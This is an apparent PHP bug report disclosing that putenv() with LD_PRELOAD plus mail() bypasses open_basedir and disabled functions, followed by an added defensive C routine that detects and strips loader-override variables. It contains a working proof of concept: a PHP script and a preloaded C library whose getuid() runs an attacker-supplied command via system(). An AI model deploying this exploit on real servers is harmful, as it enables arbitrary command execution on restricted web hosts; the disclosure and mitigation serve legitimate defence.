From:             gat3way at gat3way dot eu
Operating system: Linux
PHP version:      5.2.6
PHP Bug Type:     Safe Mode/open_basedir
Bug description:  putenv()+mail() allows for open_basedir bypass and "disabled" functionality

Description:
------------
safe_mode is safe, but the mail() function should check environment
variables IMO.

e.g. you can putenv("LD_PRELOAD=evil_library.so"); and since mail() calls
/usr/bin/mail, if your library exports a function like getuid() you can bypass
open_basedir restrictions and restrictions on program execution, etc.

If you need some more info, please contact me at:

[EMAIL PROTECTED]

Milen Rangelov

Reproduce code:
---------------
A PHP script:
<?php
putenv("LD_PRELOAD=/var/www/a.so");
$a = fopen("/var/www/.comm", "w");
fputs($a, $_GET["c"]);
fclose($a);
mail("a", "a", "a", "a");
$a = fopen("/var/www/.comm1", "r");
while (!feof($a)) {
    $b = fgets($a);
    echo $b;
}
fclose($a);
?>

A simple library:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* write() */

/* Exported under a libc name so the preloaded library is entered as soon as
   the mail helper calls getuid(). */
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;

/* Drop the override so the child started by system() is not preloaded again. */
unsetenv("LD_PRELOAD");
a=fopen("/var/www/.comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a); remove("/var/www/.comm");
rename("/var/www/a.so","/var/www/b.so");
buf=strcat(buf," > /var/www/.comm1");
system(buf);
rename("/var/www/b.so","/var/www/a.so");
free(buf);return 0;
}

Expected result:
----------------
execute arbitrary commands even though we have:

disable_functions = dl,system,exec,passthru,shell_exec,popen
open_basedir = /var/www

Actual result:
--------------
The test was successful.
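The report's point is that mail() hands the web server's whole environment, putenv()-controlled loader variables included, to the external mail helper it spawns. The added example below is not part of the bug report or of PHP's own code; it shows the check and the mitigation a defender would want in any code that spawns a helper: detect loader-override variables (LD_* on glibc, DYLD_* on macOS, an illustrative list here) and build a scrubbed environment to pass to execve()/posix_spawn() instead of the inherited one. The sample environment is constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Environment name prefixes the dynamic loader consults. An entry with one
 * of these prefixes lets whoever set it choose code that runs inside the
 * spawned helper. Illustrative list for this example; extend per platform. */
static const char *const blocked_prefixes[] = { "LD_", "DYLD_", NULL };

/* Returns 1 if a "NAME=value" entry begins with a blocked prefix, else 0. */
int env_entry_is_blocked(const char *entry)
{
    for (size_t i = 0; blocked_prefixes[i] != NULL; i++) {
        size_t n = strlen(blocked_prefixes[i]);
        if (strncmp(entry, blocked_prefixes[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Detection: index of the first blocked entry in envp, or -1 if none.
 * A mail wrapper can refuse to spawn the helper (and log) when this is >= 0. */
int env_first_blocked(char *const envp[])
{
    for (int i = 0; envp[i] != NULL; i++)
        if (env_entry_is_blocked(envp[i]))
            return i;
    return -1;
}

/* Mitigation: copy envp into out, skipping blocked entries. out must have
 * room for out_cap pointers including the terminating NULL. Returns the number
 * of entries kept, or -1 if out is too small. Pointers are shared, not
 * duplicated, so envp must outlive out. */
int scrub_env(char *const envp[], char *out[], size_t out_cap)
{
    size_t kept = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (env_entry_is_blocked(envp[i]))
            continue;
        if (kept + 1 >= out_cap)   /* one slot must remain for the NULL */
            return -1;
        out[kept++] = envp[i];
    }
    out[kept] = NULL;
    return (int)kept;
}

/* Constructed sample environment (not captured from a real system). */
static char *const sample_env[] = {
    "PATH=/usr/bin:/bin",
    "LD_PRELOAD=/var/www/a.so",
    "HOME=/var/www",
    "LD_LIBRARY_PATH=/var/www",
    "LDAP_HOST=ldap.example",   /* starts with "LD" but not "LD_": kept */
    NULL
};

int main(void)
{
    char *clean[16];
    int idx = env_first_blocked(sample_env);
    if (idx >= 0)
        printf("loader override present: %s\n", sample_env[idx]);

    int n = scrub_env(sample_env, clean, sizeof clean / sizeof clean[0]);
    printf("%d entries kept:\n", n);
    for (int i = 0; clean[i] != NULL; i++)
        printf("  %s\n", clean[i]);

    /* A real wrapper would now pass `clean` as the envp argument of
     * execve()/posix_spawn() for the sendmail helper instead of environ. */
    return 0;
}
```

Prefix matching on the full "NAME=" entry is deliberate: "LDAP_HOST" shares the letters "LD" but not the "LD_" prefix, so legitimate variables survive while every loader knob is dropped. An allow-list of the few variables the helper actually needs (PATH, HOME, LANG) is the stricter alternative when the spawning code knows its helper well.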

-- 
Edit bug report at http://bugs.php.net/?id=46741&edit=1